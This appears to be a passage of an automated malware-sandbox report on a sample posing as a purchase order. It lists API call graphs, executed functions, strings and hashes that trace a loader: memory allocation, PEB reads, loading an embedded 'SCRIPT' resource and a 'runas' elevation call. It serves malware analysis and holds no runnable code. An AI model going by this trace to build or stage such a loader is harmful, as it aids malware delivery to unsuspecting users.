96644 f8851d 42 API calls _strftime 96605->96644 96606->96572 96608 f87eec 96607->96608 96609 f87ea1 96607->96609 96613 f89096 96608->96613 96610 f1fe0b 22 API calls 96609->96610 96611 f87ec3 96610->96611 96611->96608 96612 f1fddb 22 API calls 96611->96612 96612->96611 96614 f892ab ISource 96613->96614 96621 f890ba _strcat _wcslen 96613->96621 96614->96571 96615 f0b6b5 39 API calls 96615->96621 96616 f0b567 39 API calls 96616->96621 96617 f0b38f 39 API calls 96617->96621 96618 f2ea0c 21 API calls ___std_exception_copy 96618->96621 96619 f07510 53 API calls 96619->96621 96621->96614 96621->96615 96621->96616 96621->96617 96621->96618 96621->96619 96647 f6efae 24 API calls _wcslen 96621->96647 96624 f1fc85 96622->96624 96623 f1fd1d VirtualAlloc 96625 f1fceb 96623->96625 96624->96623 96624->96625 96625->96576 96625->96577 96626->96572 96627->96572 96628->96580 96629->96582 96630->96584 96631->96587 96632->96593 96633->96593 96634->96593 96635->96563 96636->96593 96639 f68e74 _wcslen 96637->96639 96638 f68f63 96638->96600 96638->96605 96639->96638 96641 f68ea9 96639->96641 96643 f68f68 96639->96643 96641->96638 96645 f1ce60 41 API calls 96641->96645 96643->96638 96646 f1ce60 41 API calls 96643->96646 96644->96606 96645->96641 96646->96643 96647->96621 96649 f6dbdc GetFileAttributesW 96648->96649 96651 f6d4d5 96648->96651 96650 f6dbe8 FindFirstFileW 96649->96650 96649->96651 96650->96651 96652 f6dbf9 FindClose 96650->96652 96651->96098 96652->96651 96654 f4f545 96653->96654 96655 f09c7e 96653->96655 96656 f4f556 96654->96656 96658 f06b57 22 API calls 96654->96658 96660 f1fddb 22 API calls 96655->96660 96657 f0a6c3 22 API calls 96656->96657 96659 f4f560 96657->96659 96658->96656 96659->96659 96661 f09c91 96660->96661 96662 f09c9a 96661->96662 96663 f09cac 96661->96663 96664 f09cb3 22 API calls 96662->96664 96665 f0a961 22 API calls 96663->96665 96666 f09ca2 96664->96666 96665->96666 96666->96220 96666->96225 96721 f054c6 96667->96721 96670 f054c6 3 API calls 96671 f1fa9a 96670->96671 96671->96242 96673 f1f188 96672->96673 96674 f1f14c 96672->96674 96675 f0a6c3 22 API calls 96673->96675 96674->96673 96676 f1f15b 96674->96676 96685 f6caeb 96675->96685 96677 f1f170 96676->96677 96678 f1f17d 96676->96678 96727 f1f18e 96677->96727 96734 f6cbf2 26 API calls 96678->96734 96681 f1f179 96681->96256 96684 f6cb1a 96684->96256 96685->96684 96735 f6ca89 ReadFile SetFilePointerEx 96685->96735 96736 f049bd 22 API calls __fread_nolock 96685->96736 96687 f06250 96686->96687 96688 f0625f 96686->96688 96687->96230 96688->96687 96689 f06264 CloseHandle 96688->96689 96689->96687 96691 f44035 96690->96691 96692 f0575c CreateFileW 96690->96692 96693 f0577b 96691->96693 96694 f4403b CreateFileW 96691->96694 96692->96693 96693->96252 96693->96253 96694->96693 96695 f44063 96694->96695 96696 f054c6 3 API calls 96695->96696 96697 f4406e 96696->96697 96697->96693 96699 f053f3 96698->96699 96712 f053f0 ISource 96698->96712 96700 f054c6 3 API calls 96699->96700 96699->96712 96701 f05410 96700->96701 96702 f0541d 96701->96702 96703 f43f4b 96701->96703 96704 f1fe0b 22 API calls 96702->96704 96705 f1fa5b 3 API calls 96703->96705 96706 f05429 96704->96706 96705->96712 96707 f05722 22 API calls 96706->96707 96708 f05433 96707->96708 96709 f09a40 2 API calls 96708->96709 96710 f0543f 96709->96710 96711 f054c6 3 API calls 96710->96711 96711->96712 96712->96263 96713->96266 96714->96264 96715->96268 96716->96272 96717->96225 96718->96225 96719->96255 96720->96260 96724 f054dd 96721->96724 96722 f05564 SetFilePointerEx SetFilePointerEx 96726 f05530 96722->96726 96723 f43f9c SetFilePointerEx 96724->96722 96724->96723 96725 f43f8b 96724->96725 96724->96726 96725->96723 96726->96670 96737 f1f1d8 96727->96737 96733 f1f1c1 96733->96681 96734->96681 96735->96685 96736->96685 96738 f1fe0b 22 API calls 96737->96738 96739 f1f1ef 96738->96739 96740 f1fddb 22 API calls 96739->96740 96741 f1f1a6 96740->96741 96742 f097b6 96741->96742 96756 f09a1e 96742->96756 96744 f097fc 96744->96733 96748 f06e14 MultiByteToWideChar 96744->96748 96746 f097c7 96746->96744 96763 f09a40 96746->96763 96769 f09b01 22 API calls __fread_nolock 96746->96769 96749 f06e40 96748->96749 96750 f06e87 96748->96750 96752 f1fe0b 22 API calls 96749->96752 96751 f0a6c3 22 API calls 96750->96751 96755 f06e7b 96751->96755 96753 f06e55 MultiByteToWideChar 96752->96753 96771 f06e90 22 API calls __fread_nolock 96753->96771 96755->96733 96757 f4f378 96756->96757 96758 f09a2f 96756->96758 96759 f1fddb 22 API calls 96757->96759 96758->96746 96760 f4f382 96759->96760 96761 f1fe0b 22 API calls 96760->96761 96762 f4f397 96761->96762 96764 f09abb 96763->96764 96768 f09a4e 96763->96768 96770 f1e40f SetFilePointerEx 96764->96770 96766 f09a7c 96766->96746 96767 f09a8c ReadFile 96767->96766 96767->96768 96768->96766 96768->96767 96769->96746 96770->96768 96771->96755 96772->96318 96773->96323 96774->96322 96775->96320 96776->96320 96777 eb295b 96778 eb2962 96777->96778 96779 eb296a 96778->96779 96780 eb2a00 96778->96780 96784 eb2610 96779->96784 96797 eb32b0 9 API calls 96780->96797 96783 eb29e7 96798 eb0000 96784->96798 96787 eb26e0 CreateFileW 96788 eb26af 96787->96788 96791 eb26ed 96787->96791 96789 eb2709 VirtualAlloc 96788->96789 96788->96791 96795 eb2810 FindCloseChangeNotification 96788->96795 96796 eb2820 VirtualFree 96788->96796 96801 eb3520 GetPEB 96788->96801 96790 eb272a ReadFile 96789->96790 96789->96791 96790->96791 96794 eb2748 VirtualAlloc 96790->96794 96792 eb290a 96791->96792 96793 eb28fc VirtualFree 96791->96793 96792->96783 96793->96792 96794->96788 96794->96791 96795->96788 96796->96788 96797->96783 96803 eb34c0 GetPEB 96798->96803 96800 eb068b 96800->96788 96802 eb354a 96801->96802 96802->96787 96804 eb34ea 96803->96804 96804->96800 96805 f38402 96810 f381be 96805->96810 96808 f3842a 96811 f381ef try_get_first_available_module 96810->96811 96818 f38338 96811->96818 96825 f28e0b 40 API calls 2 library calls 96811->96825 96813 f383ee 96829 f327ec 26 API calls __cftof 96813->96829 96815 f38343 96815->96808 96822 f40984 96815->96822 96817 f3838c 96817->96818 96826 f28e0b 40 API calls 2 library calls 96817->96826 96818->96815 96828 f2f2d9 20 API calls __dosmaperr 96818->96828 96820 f383ab 96820->96818 96827 f28e0b 40 API calls 2 library calls 96820->96827 96830 f40081 96822->96830 96824 f4099f 96824->96808 96825->96817 96826->96820 96827->96818 96828->96813 96829->96815 96832 f4008d CallCatchBlock 96830->96832 96831 f4009b 96887 f2f2d9 20 API calls __dosmaperr 96831->96887 96832->96831 96834 f400d4 96832->96834 96841 f4065b 96834->96841 96835 f400a0 96888 f327ec 26 API calls __cftof 96835->96888 96838 f400aa __fread_nolock 96838->96824 96842 f40678 96841->96842 96843 f406a6 96842->96843 96844 f4068d 96842->96844 96890 f35221 96843->96890 96904 f2f2c6 20 API calls __dosmaperr 96844->96904 96847 f406ab 96848 f406b4 96847->96848 96849 f406cb 96847->96849 96906 f2f2c6 20 API calls __dosmaperr 96848->96906 96903 f4039a CreateFileW 96849->96903 96853 f400f8 96889 f40121 LeaveCriticalSection __wsopen_s 96853->96889 96854 f406b9 96907 f2f2d9 20 API calls __dosmaperr 96854->96907 96855 f40781 GetFileType 96858 f407d3 96855->96858 96859 f4078c GetLastError 96855->96859 96857 f40756 GetLastError 96909 f2f2a3 20 API calls __dosmaperr 96857->96909 96912 f3516a 21 API calls 2 library calls 96858->96912 96910 f2f2a3 20 API calls __dosmaperr 96859->96910 96860 f40692 96905 f2f2d9 20 API calls __dosmaperr 96860->96905 96861 f40704 96861->96855 96861->96857 96908 f4039a CreateFileW 96861->96908 96865 f4079a CloseHandle 96865->96860 96868 f407c3 96865->96868 96867 f40749 96867->96855 96867->96857 96911 f2f2d9 20 API calls __dosmaperr 96868->96911 96870 f407f4 96872 f40840 96870->96872 96913 f405ab 72 API calls 3 library calls 96870->96913 96871 f407c8 96871->96860 96876 f4086d 96872->96876 96914 f4014d 72 API calls 4 library calls 96872->96914 96875 f40866 96875->96876 96877 f4087e 96875->96877 96878 f386ae __wsopen_s 29 API calls 96876->96878 96877->96853 96879 f408fc CloseHandle 96877->96879 96878->96853 96915 f4039a CreateFileW 96879->96915 96881 f40927 96882 f40931 GetLastError 96881->96882 96883 f4095d 96881->96883 96916 f2f2a3 20 API calls __dosmaperr 96882->96916 96883->96853 96885 f4093d 96917 f35333 21 API calls 2 library calls 96885->96917 96887->96835 96888->96838 96889->96838 96891 f3522d CallCatchBlock 96890->96891 96918 f32f5e EnterCriticalSection 96891->96918 96893 f35234 96895 f35259 96893->96895 96899 f352c7 EnterCriticalSection 96893->96899 96900 f3527b 96893->96900 96897 f35000 __wsopen_s 21 API calls 96895->96897 96896 f352a4 __fread_nolock 96896->96847 96898 f3525e 96897->96898 96898->96900 96922 f35147 EnterCriticalSection 96898->96922 96899->96900 96901 f352d4 LeaveCriticalSection 96899->96901 96919 f3532a 96900->96919 96901->96893 96903->96861 96904->96860 96905->96853 96906->96854 96907->96860 96908->96867 96909->96860 96910->96865 96911->96871 96912->96870 96913->96872 96914->96875 96915->96881 96916->96885 96917->96883 96918->96893 96923 f32fa6 LeaveCriticalSection 96919->96923 96921 f35331 96921->96896 96922->96900 96923->96921 96924 f42ba5 96925 f02b25 96924->96925 96926 f42baf 96924->96926 96952 f02b83 7 API calls 96925->96952 96928 f03a5a 24 API calls 96926->96928 96930 f42bb8 96928->96930 96932 f09cb3 22 API calls 96930->96932 96934 f42bc6 96932->96934 96933 f02b2f 96938 f03837 49 API calls 96933->96938 96942 f02b44 96933->96942 96935 f42bf5 96934->96935 96936 f42bce 96934->96936 96937 f033c6 22 API calls 96935->96937 96939 f033c6 22 API calls 96936->96939 96950 f42bf1 GetForegroundWindow ShellExecuteW 96937->96950 96938->96942 96940 f42bd9 96939->96940 96944 f06350 22 API calls 96940->96944 96943 f02b5f 96942->96943 96956 f030f2 Shell_NotifyIconW ___scrt_fastfail 96942->96956 96949 f02b66 SetCurrentDirectoryW 96943->96949 96947 f42be7 96944->96947 96945 f42c26 96945->96943 96948 f033c6 22 API calls 96947->96948 96948->96950 96951 f02b7a 96949->96951 96950->96945 96957 f02cd4 7 API calls 96952->96957 96954 f02b2a 96955 f02c63 CreateWindowExW CreateWindowExW ShowWindow ShowWindow 96954->96955 96955->96933 96956->96943 96957->96954 96958 f02de3 96959 f02df0 __wsopen_s 96958->96959 96960 f02e09 96959->96960 96961 f42c2b ___scrt_fastfail 96959->96961 96962 f03aa2 23 API calls 96960->96962 96963 f42c47 GetOpenFileNameW 96961->96963 96964 f02e12 96962->96964 96965 f42c96 96963->96965 96974 f02da5 96964->96974 96967 f06b57 22 API calls 96965->96967 96969 f42cab 96967->96969 96969->96969 96971 f02e27 96992 f044a8 96971->96992 96975 f41f50 __wsopen_s 96974->96975 96976 f02db2 GetLongPathNameW 96975->96976 96977 f06b57 22 API calls 96976->96977 96978 f02dda 96977->96978 96979 f03598 96978->96979 96980 f0a961 22 API calls 96979->96980 96981 f035aa 96980->96981 96982 f03aa2 23 API calls 96981->96982 96983 f035b5 96982->96983 96984 f035c0 96983->96984 96987 f432eb 96983->96987 96985 f0515f 22 API calls 96984->96985 96988 f035cc 96985->96988 96989 f4330d 96987->96989 97027 f1ce60 41 API calls 96987->97027 97021 f035f3 96988->97021 96991 f035df 96991->96971 96993 f04ecb 94 API calls 96992->96993 96994 f044cd 96993->96994 96995 f43833 96994->96995 96997 f04ecb 94 API calls 96994->96997 96996 f72cf9 80 API calls 96995->96996 96998 f43848 96996->96998 96999 f044e1 96997->96999 97000 f4384c 96998->97000 97001 f43869 96998->97001 96999->96995 97002 f044e9 96999->97002 97003 f04f39 68 API calls 97000->97003 97004 f1fe0b 22 API calls 97001->97004 97005 f43854 97002->97005 97006 f044f5 97002->97006 97003->97005 97020 f438ae 97004->97020 97043 f6da5a 82 API calls 97005->97043 97042 f0940c 136 API calls 2 library calls 97006->97042 97009 f02e31 97010 f43862 97010->97001 97011 f04f39 68 API calls 97014 f43a5f 97011->97014 97014->97011 97047 f6989b 82 API calls __wsopen_s 97014->97047 97017 f09cb3 22 API calls 97017->97020 97020->97014 97020->97017 97028 f0a4a1 97020->97028 97036 f03ff7 97020->97036 97044 f6967e 22 API calls __fread_nolock 97020->97044 97045 f695ad 42 API calls _wcslen 97020->97045 97046 f70b5a 22 API calls 97020->97046 97022 f03605 97021->97022 97026 f03624 __fread_nolock 97021->97026 97024 f1fe0b 22 API calls 97022->97024 97023 f1fddb 22 API calls 97025 f0363b 97023->97025 97024->97026 97025->96991 97026->97023 97027->96987 97029 f0a52b 97028->97029 97035 f0a4b1 __fread_nolock 97028->97035 97031 f1fe0b 22 API calls 97029->97031 97030 f1fddb 22 API calls 97032 f0a4b8 97030->97032 97031->97035 97033 f1fddb 22 API calls 97032->97033 97034 f0a4d6 97032->97034 97033->97034 97034->97020 97035->97030 97037 f0400a 97036->97037 97040 f040ae 97036->97040 97039 f1fe0b 22 API calls 97037->97039 97041 f0403c 97037->97041 97038 f1fddb 22 API calls 97038->97041 97039->97041 97040->97020 97041->97038 97041->97040 97042->97009 97043->97010 97044->97020 97045->97020 97046->97020 97047->97014 97048 f01044 97053 f010f3 97048->97053 97050 f0104a 97089 f200a3 29 API calls __onexit 97050->97089 97052 f01054 97090 f01398 97053->97090 97057 f0116a 97058 f0a961 22 API calls 97057->97058 97059 f01174 97058->97059 97060 f0a961 22 API calls 97059->97060 97061 f0117e 97060->97061 97062 f0a961 22 API calls 97061->97062 97063 f01188 97062->97063 97064 f0a961 22 API calls 97063->97064 97065 f011c6 97064->97065 97066 f0a961 22 API calls 97065->97066 97067 f01292 97066->97067 97100 f0171c 97067->97100 97071 f012c4 97072 f0a961 22 API calls 97071->97072 97073 f012ce 97072->97073 97074 f11940 9 API calls 97073->97074 97075 f012f9 97074->97075 97121 f01aab 97075->97121 97077 f01315 97078 f01325 GetStdHandle 97077->97078 97079 f42485 97078->97079 97080 f0137a 97078->97080 97079->97080 97081 f4248e 97079->97081 97083 f01387 OleInitialize 97080->97083 97082 f1fddb 22 API calls 97081->97082 97084 f42495 97082->97084 97083->97050 97128 f7011d InitializeCriticalSectionAndSpinCount InterlockedExchange GetCurrentProcess GetCurrentProcess DuplicateHandle 97084->97128 97086 f4249e 97129 f70944 CreateThread 97086->97129 97088 f424aa CloseHandle 97088->97080 97089->97052 97130 f013f1 97090->97130 97093 f013f1 22 API calls 97094 f013d0 97093->97094 97095 f0a961 22 API calls 97094->97095 97096 f013dc 97095->97096 97097 f06b57 22 API calls 97096->97097 97098 f01129 97097->97098 97099 f01bc3 6 API calls 97098->97099 97099->97057 97101 f0a961 22 API calls 97100->97101 97102 f0172c 97101->97102 97103 f0a961 22 API calls 97102->97103 97104 f01734 97103->97104 97105 f0a961 22 API calls 97104->97105 97106 f0174f 97105->97106 97107 f1fddb 22 API calls 97106->97107 97108 f0129c 97107->97108 97109 f01b4a 97108->97109 97110 f01b58 97109->97110 97111 f0a961 22 API calls 97110->97111 97112 f01b63 97111->97112 97113 f0a961 22 API calls 97112->97113 97114 f01b6e 97113->97114 97115 f0a961 22 API calls 97114->97115 97116 f01b79 97115->97116 97117 f0a961 22 API calls 97116->97117 97118 f01b84 97117->97118 97119 f1fddb 22 API calls 97118->97119 97120 f01b96 RegisterWindowMessageW 97119->97120 97120->97071 97122 f4272d 97121->97122 97123 f01abb 97121->97123 97137 f73209 23 API calls 97122->97137 97125 f1fddb 22 API calls 97123->97125 97127 f01ac3 97125->97127 97126 f42738 97127->97077 97128->97086 97129->97088 97138 f7092a 28 API calls 97129->97138 97131 f0a961 22 API calls 97130->97131 97132 f013fc 97131->97132 97133 f0a961 22 API calls 97132->97133 97134 f01404 97133->97134 97135 f0a961 22 API calls 97134->97135 97136 f013c6 97135->97136 97136->97093 97137->97126 97139 f52a00 97153 f0d7b0 ISource 97139->97153 97140 f0db11 PeekMessageW 97140->97153 97141 f0d807 GetInputState 97141->97140 97141->97153 97142 f51cbe TranslateAcceleratorW 97142->97153 97144 f0db73 TranslateMessage DispatchMessageW 97145 f0db8f PeekMessageW 97144->97145 97145->97153 97146 f0da04 timeGetTime 97146->97153 97147 f0dbaf Sleep 97169 f0dbc0 97147->97169 97148 f52b74 Sleep 97148->97169 97149 f51dda timeGetTime 97203 f1e300 23 API calls 97149->97203 97150 f1e551 timeGetTime 97150->97169 97153->97140 97153->97141 97153->97142 97153->97144 97153->97145 97153->97146 97153->97147 97153->97148 97153->97149 97160 f0d9d5 97153->97160 97166 f0ec40 256 API calls 97153->97166 97167 f11310 256 API calls 97153->97167 97171 f0dd50 97153->97171 97178 f0dfd0 97153->97178 97201 f0bf40 256 API calls 2 library calls 97153->97201 97202 f1edf6 IsDialogMessageW GetClassLongW 97153->97202 97204 f73a2a 23 API calls 97153->97204 97205 f7359c 82 API calls __wsopen_s 97153->97205 97154 f52c0b GetExitCodeProcess 97156 f52c37 CloseHandle 97154->97156 97157 f52c21 WaitForSingleObject 97154->97157 97156->97169 97157->97153 97157->97156 97158 f52a31 97158->97160 97159 f929bf GetForegroundWindow 97159->97169 97161 f52ca9 Sleep 97161->97153 97166->97153 97167->97153 97169->97150 97169->97153 97169->97154 97169->97158 97169->97159 97169->97160 97169->97161 97206 f85658 23 API calls 97169->97206 97207 f6e97b QueryPerformanceCounter QueryPerformanceFrequency Sleep QueryPerformanceCounter Sleep 97169->97207 97208 f6d4dc 47 API calls 97169->97208 97172 f0dd83 97171->97172 97173 f0dd6f 97171->97173 97210 f7359c 82 API calls __wsopen_s 97172->97210 97209 f0d260 256 API calls 2 library calls 97173->97209 97175 f0dd7a 97175->97153 97177 f52f75 97177->97177 97179 f0e010 97178->97179 97194 f0e0dc ISource 97179->97194 97213 f20242 5 API calls __Init_thread_wait 97179->97213 97182 f0e3e1 97182->97153 97183 f52fca 97185 f0a961 22 API calls 97183->97185 97183->97194 97184 f0a961 22 API calls 97184->97194 97186 f52fe4 97185->97186 97214 f200a3 29 API calls __onexit 97186->97214 97190 f52fee 97215 f201f8 EnterCriticalSection LeaveCriticalSection SetEvent ResetEvent 97190->97215 97194->97182 97194->97184 97195 f0a8c7 22 API calls 97194->97195 97196 f0ec40 256 API calls 97194->97196 97197 f104f0 22 API calls 97194->97197 97198 f7359c 82 API calls 97194->97198 97211 f0a81b 41 API calls 97194->97211 97212 f1a308 256 API calls 97194->97212 97216 f20242 5 API calls __Init_thread_wait 97194->97216 97217 f200a3 29 API calls __onexit 97194->97217 97218 f201f8 EnterCriticalSection LeaveCriticalSection SetEvent ResetEvent 97194->97218 97219 f847d4 256 API calls 97194->97219 97220 f868c1 256 API calls 97194->97220 97195->97194 97196->97194 97197->97194 97198->97194 97201->97153 97202->97153 97203->97153 97204->97153 97205->97153 97206->97169 97207->97169 97208->97169 97209->97175 97210->97177 97211->97194 97212->97194 97213->97183 97214->97190 97215->97194 97216->97194 97217->97194 97218->97194 97219->97194 97220->97194 97221 eb23b0 97222 eb0000 GetPEB 97221->97222 97223 eb2493 97222->97223 97235 eb22a0 97223->97235 97236 eb22a9 Sleep 97235->97236 97237 eb22b7 97236->97237 97238 f01cad SystemParametersInfoW

                          Executed Functions

                          Function 00F042DE Relevance: 21.2, APIs: 9, Strings: 3, Instructions: 235libraryloaderCOMMON
                          Download Yara Rule

                          Control-flow Graph

                          • Executed
                          • Not Executed
                          control_flow_graph 234 f042de-f0434d call f0a961 GetVersionExW call f06b57 239 f43617-f4362a 234->239 240 f04353 234->240 241 f4362b-f4362f 239->241 242 f04355-f04357 240->242 243 f43631 241->243 244 f43632-f4363e 241->244 245 f43656 242->245 246 f0435d-f043bc call f093b2 call f037a0 242->246 243->244 244->241 247 f43640-f43642 244->247 250 f4365d-f43660 245->250 263 f043c2-f043c4 246->263 264 f437df-f437e6 246->264 247->242 249 f43648-f4364f 247->249 249->239 252 f43651 249->252 253 f43666-f436a8 250->253 254 f0441b-f04435 GetCurrentProcess IsWow64Process 250->254 252->245 253->254 258 f436ae-f436b1 253->258 256 f04494-f0449a 254->256 257 f04437 254->257 260 f0443d-f04449 256->260 257->260 261 f436b3-f436bd 258->261 262 f436db-f436e5 258->262 270 f43824-f43828 GetSystemInfo 260->270 271 f0444f-f0445e LoadLibraryA 260->271 272 f436bf-f436c5 261->272 273 f436ca-f436d6 261->273 266 f436e7-f436f3 262->266 267 f436f8-f43702 262->267 263->250 265 f043ca-f043dd 263->265 268 f43806-f43809 264->268 269 f437e8 264->269 274 f43726-f4372f 265->274 275 f043e3-f043e5 265->275 266->254 277 f43704-f43710 267->277 278 f43715-f43721 267->278 279 f437f4-f437fc 268->279 280 f4380b-f4381a 268->280 276 f437ee 269->276 281 f04460-f0446e GetProcAddress 271->281 282 f0449c-f044a6 GetSystemInfo 271->282 272->254 273->254 286 f43731-f43737 274->286 287 f4373c-f43748 274->287 284 f4374d-f43762 275->284 285 f043eb-f043ee 275->285 276->279 277->254 278->254 279->268 280->276 288 f4381c-f43822 280->288 281->282 289 f04470-f04474 GetNativeSystemInfo 281->289 283 f04476-f04478 282->283 294 f04481-f04493 283->294 295 f0447a-f0447b FreeLibrary 283->295 292 f43764-f4376a 284->292 293 f4376f-f4377b 284->293 290 f043f4-f0440f 285->290 291 f43791-f43794 285->291 286->254 287->254 288->279 289->283 296 f43780-f4378c 290->296 297 f04415 290->297 291->254 298 f4379a-f437c1 291->298 292->254 293->254 295->294 296->254 297->254 299 f437c3-f437c9 298->299 300 f437ce-f437da 298->300 299->254 300->254
                          APIs
                          • GetVersionExW.KERNEL32(?), ref: 00F0430D
                            • Part of subcall function 00F06B57: _wcslen.LIBCMT ref: 00F06B6A
                          • GetCurrentProcess.KERNEL32(?,00F9CB64,00000000,?,?), ref: 00F04422
                          • IsWow64Process.KERNEL32(00000000,?,?), ref: 00F04429
                          • LoadLibraryA.KERNEL32(kernel32.dll,?,?), ref: 00F04454
                          • GetProcAddress.KERNEL32(00000000,GetNativeSystemInfo), ref: 00F04466
                          • GetNativeSystemInfo.KERNELBASE(?,?,?), ref: 00F04474
                          • FreeLibrary.KERNEL32(00000000,?,?), ref: 00F0447B
                          • GetSystemInfo.KERNEL32(?,?,?), ref: 00F044A0
                          Strings
                          Memory Dump Source
                          • Source File: 00000000.00000002.1657459667.0000000000F01000.00000020.00000001.01000000.00000003.sdmp, Offset: 00F00000, based on PE: true
                          • Associated: 00000000.00000002.1657434324.0000000000F00000.00000002.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1657517581.0000000000F9C000.00000002.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1657517581.0000000000FC2000.00000002.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1657569007.0000000000FCC000.00000004.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1657589937.0000000000FD4000.00000002.00000001.01000000.00000003.sdmpDownload File
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_0_2_f00000_PO_987654345678.jbxd
                          Similarity
                          • API ID: InfoLibraryProcessSystem$AddressCurrentFreeLoadNativeProcVersionWow64_wcslen
                          • String ID: GetNativeSystemInfo$kernel32.dll$|O
                          • API String ID: 3290436268-3101561225
                          • Opcode ID: 4a9c1035ee6ed631a0a4a01a5ea59fe1f13ff070002f3716c53c3892ca0d638b
                          • Instruction ID: be3c92eef7eb7e92de8c6e1420abc940ea42afd94f3f74d5392158bcdec60822
                          • Opcode Fuzzy Hash: 4a9c1035ee6ed631a0a4a01a5ea59fe1f13ff070002f3716c53c3892ca0d638b
                          • Instruction Fuzzy Hash: BFA1A5A6D0F2CCFFCB11CBB9BC416997FA7BB26310B08449BD98193A62D2305544FB61
                          Function 00F042A2 Relevance: 10.6, APIs: 5, Strings: 1, Instructions: 61COMMON
                          Download Yara Rule

                          Control-flow Graph

                          • Executed
                          • Not Executed
                          control_flow_graph 661 f042a2-f042ba CreateStreamOnHGlobal 662 f042da-f042dd 661->662 663 f042bc-f042d3 FindResourceExW 661->663 664 f042d9 663->664 665 f435ba-f435c9 LoadResource 663->665 664->662 665->664 666 f435cf-f435dd SizeofResource 665->666 666->664 667 f435e3-f435ee LockResource 666->667 667->664 668 f435f4-f43612 667->668 668->664
                          APIs
                          • CreateStreamOnHGlobal.OLE32(00000000,00000001,?,?,?,?,?,00F050AA,?,?,00000000,00000000), ref: 00F042B2
                          • FindResourceExW.KERNEL32(?,0000000A,SCRIPT,00000000,?,?,00F050AA,?,?,00000000,00000000), ref: 00F042C9
                          • LoadResource.KERNEL32(?,00000000,?,?,00F050AA,?,?,00000000,00000000,?,?,?,?,?,?,00F04F20), ref: 00F435BE
                          • SizeofResource.KERNEL32(?,00000000,?,?,00F050AA,?,?,00000000,00000000,?,?,?,?,?,?,00F04F20), ref: 00F435D3
                          • LockResource.KERNEL32(00F050AA,?,?,00F050AA,?,?,00000000,00000000,?,?,?,?,?,?,00F04F20,?), ref: 00F435E6
                          Strings
                          Memory Dump Source
                          • Source File: 00000000.00000002.1657459667.0000000000F01000.00000020.00000001.01000000.00000003.sdmp, Offset: 00F00000, based on PE: true
                          • Associated: 00000000.00000002.1657434324.0000000000F00000.00000002.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1657517581.0000000000F9C000.00000002.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1657517581.0000000000FC2000.00000002.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1657569007.0000000000FCC000.00000004.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1657589937.0000000000FD4000.00000002.00000001.01000000.00000003.sdmpDownload File
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_0_2_f00000_PO_987654345678.jbxd
                          Similarity
                          • API ID: Resource$CreateFindGlobalLoadLockSizeofStream
                          • String ID: SCRIPT
                          • API String ID: 3051347437-3967369404
                          • Opcode ID: e038c8e8624bda86c00a2558445eceef40ef671b8fc1444bd02dfcb322777f38
                          • Instruction ID: 0a1f442044e95b5dba67e92e51fac25d4e9585a11aac53ee7a51f020c2cf123d
                          • Opcode Fuzzy Hash: e038c8e8624bda86c00a2558445eceef40ef671b8fc1444bd02dfcb322777f38
                          • Instruction Fuzzy Hash: 59118EB1700705BFEB218B65DC48F277BB9EBC5B61F14416AF502D6290DB71EC00A670
                          Function 00F42BA5 Relevance: 7.1, APIs: 3, Strings: 1, Instructions: 62COMMON
                          Download Yara Rule

                          Control-flow Graph

                          APIs
                          • SetCurrentDirectoryW.KERNEL32(?), ref: 00F02B6B
                            • Part of subcall function 00F03A5A: GetModuleFileNameW.KERNEL32(00000000,?,00007FFF,00FD1418,?,00F02E7F,?,?,?,00000000), ref: 00F03A78
                            • Part of subcall function 00F09CB3: _wcslen.LIBCMT ref: 00F09CBD
                          • GetForegroundWindow.USER32(runas,?,?,?,?,?,00FC2224), ref: 00F42C10
                          • ShellExecuteW.SHELL32(00000000,?,?,00FC2224), ref: 00F42C17
                          Strings
                          Memory Dump Source
                          • Source File: 00000000.00000002.1657459667.0000000000F01000.00000020.00000001.01000000.00000003.sdmp, Offset: 00F00000, based on PE: true
                          • Associated: 00000000.00000002.1657434324.0000000000F00000.00000002.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1657517581.0000000000F9C000.00000002.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1657517581.0000000000FC2000.00000002.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1657569007.0000000000FCC000.00000004.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1657589937.0000000000FD4000.00000002.00000001.01000000.00000003.sdmpDownload File
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_0_2_f00000_PO_987654345678.jbxd
                          Similarity
                          • API ID: CurrentDirectoryExecuteFileForegroundModuleNameShellWindow_wcslen
                          • String ID: runas
                          • API String ID: 448630720-4000483414
                          • Opcode ID: a8ce090a448a0d9b034f5f55068c331d185c34460e9551d4a843136fd669646b
                          • Instruction ID: 8b0764d727d820f46ffb844c3f5256bf06808eee970e9da56ce6cced94d7c624
                          • Opcode Fuzzy Hash: a8ce090a448a0d9b034f5f55068c331d185c34460e9551d4a843136fd669646b
                          • Instruction Fuzzy Hash: 981106716083456ACB04FF60DC56EBE77A9ABD2710F84442EF042421E3DF388649F762
                          Function 00F6DBBE Relevance: 6.0, APIs: 4, Instructions: 29filestringCOMMON
                          Download Yara Rule
                          APIs
                          • lstrlenW.KERNEL32(?,00F45222), ref: 00F6DBCE
                          • GetFileAttributesW.KERNELBASE(?), ref: 00F6DBDD
                          • FindFirstFileW.KERNELBASE(?,?), ref: 00F6DBEE
                          • FindClose.KERNEL32(00000000), ref: 00F6DBFA
                          Memory Dump Source
                          • Source File: 00000000.00000002.1657459667.0000000000F01000.00000020.00000001.01000000.00000003.sdmp, Offset: 00F00000, based on PE: true
                          • Associated: 00000000.00000002.1657434324.0000000000F00000.00000002.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1657517581.0000000000F9C000.00000002.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1657517581.0000000000FC2000.00000002.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1657569007.0000000000FCC000.00000004.00000001.01000000.00000003.sdmpDownload File
